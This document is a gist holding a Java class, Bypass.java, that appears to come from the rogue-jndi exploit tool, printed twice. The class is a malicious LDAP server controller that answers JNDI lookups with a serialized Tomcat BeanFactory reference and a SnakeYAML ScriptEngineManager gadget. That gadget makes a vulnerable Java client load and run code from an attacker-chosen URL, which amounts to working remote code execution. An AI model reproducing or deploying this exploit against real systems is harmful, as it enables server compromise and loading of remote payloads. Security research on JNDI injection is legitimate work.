TheGrandPew/Bypass.java Secret

## Bypass.java
package artsploit.controllers;

import artsploit.Config;
import artsploit.annotations.LdapMapping;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;
import org.apache.naming.ResourceRef;

import javax.naming.StringRefAddr;

import static artsploit.Utilities.makeJavaScriptString;
import static artsploit.Utilities.serialize;

/**
 * Yields:
 *  RCE via arbitrary bean creation in {@link org.apache.naming.factory.BeanFactory}
 *  When bean is created on the server side, we can control its class name and setter methods,
 *   so we can leverage {@link javax.el.ELProcessor#eval} method to execute arbitrary Java code via EL evaluation
 *
 * @see https://www.veracode.com/blog/research/exploiting-jndi-injections-java for details
 *
 * Requires:
 *  - tomcat-embed-core.jar
 *  - tomcat-embed-el.jar
 *
 * @author artsploit
 */
@LdapMapping(uri = { "/o=bypass" })
public class Bypass implements LdapController {

    String payloadURL = Config.command;

    public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception {

        System.out.println("Sending LDAP ResourceRef result for " + base + " with Bypass payload");

        Entry e = new Entry(base);
        e.addAttribute("javaClassName", "java.lang.String"); //could be any

        //prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory
        ResourceRef ref = new ResourceRef("org.yaml.snakeyaml.Yaml", null, "", "",
                true, "org.apache.naming.factory.BeanFactory", null);
        ref.add(new StringRefAddr("forceString", "x=load"));
        ref.add(new StringRefAddr("x", "!!javax.script.ScriptEngineManager [\n  !!java.net.URLClassLoader [[\n    !!java.net.URL [\""+payloadURL+"\"]\n  ]]\n]"));

        //END OF REF
        e.addAttribute("javaSerializedData", serialize(ref));

        result.sendSearchEntry(e);
        result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
    }
}
	package artsploit.controllers;

	import artsploit.Config;
	import artsploit.annotations.LdapMapping;
	import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
	import com.unboundid.ldap.sdk.Entry;
	import com.unboundid.ldap.sdk.LDAPResult;
	import com.unboundid.ldap.sdk.ResultCode;
	import org.apache.naming.ResourceRef;

	import javax.naming.StringRefAddr;

	import static artsploit.Utilities.makeJavaScriptString;
	import static artsploit.Utilities.serialize;

	/**
	* Yields:
	* RCE via arbitrary bean creation in {@link org.apache.naming.factory.BeanFactory}
	* When bean is created on the server side, we can control its class name and setter methods,
	* so we can leverage {@link javax.el.ELProcessor#eval} method to execute arbitrary Java code via EL evaluation
	*
	* @see https://www.veracode.com/blog/research/exploiting-jndi-injections-java for details
	*
	* Requires:
	* - tomcat-embed-core.jar
	* - tomcat-embed-el.jar
	*
	* @author artsploit
	*/
	@LdapMapping(uri = { "/o=bypass" })
	public class Bypass implements LdapController {

	String payloadURL = Config.command;

	public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception {

	System.out.println("Sending LDAP ResourceRef result for " + base + " with Bypass payload");

	Entry e = new Entry(base);
	e.addAttribute("javaClassName", "java.lang.String"); //could be any

	//prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory
	ResourceRef ref = new ResourceRef("org.yaml.snakeyaml.Yaml", null, "", "",
	true, "org.apache.naming.factory.BeanFactory", null);
	ref.add(new StringRefAddr("forceString", "x=load"));
	ref.add(new StringRefAddr("x", "!!javax.script.ScriptEngineManager [\n !!java.net.URLClassLoader [[\n !!java.net.URL [\""+payloadURL+"\"]\n ]]\n]"));

	//END OF REF
	e.addAttribute("javaSerializedData", serialize(ref));

	result.sendSearchEntry(e);
	result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
	}
	}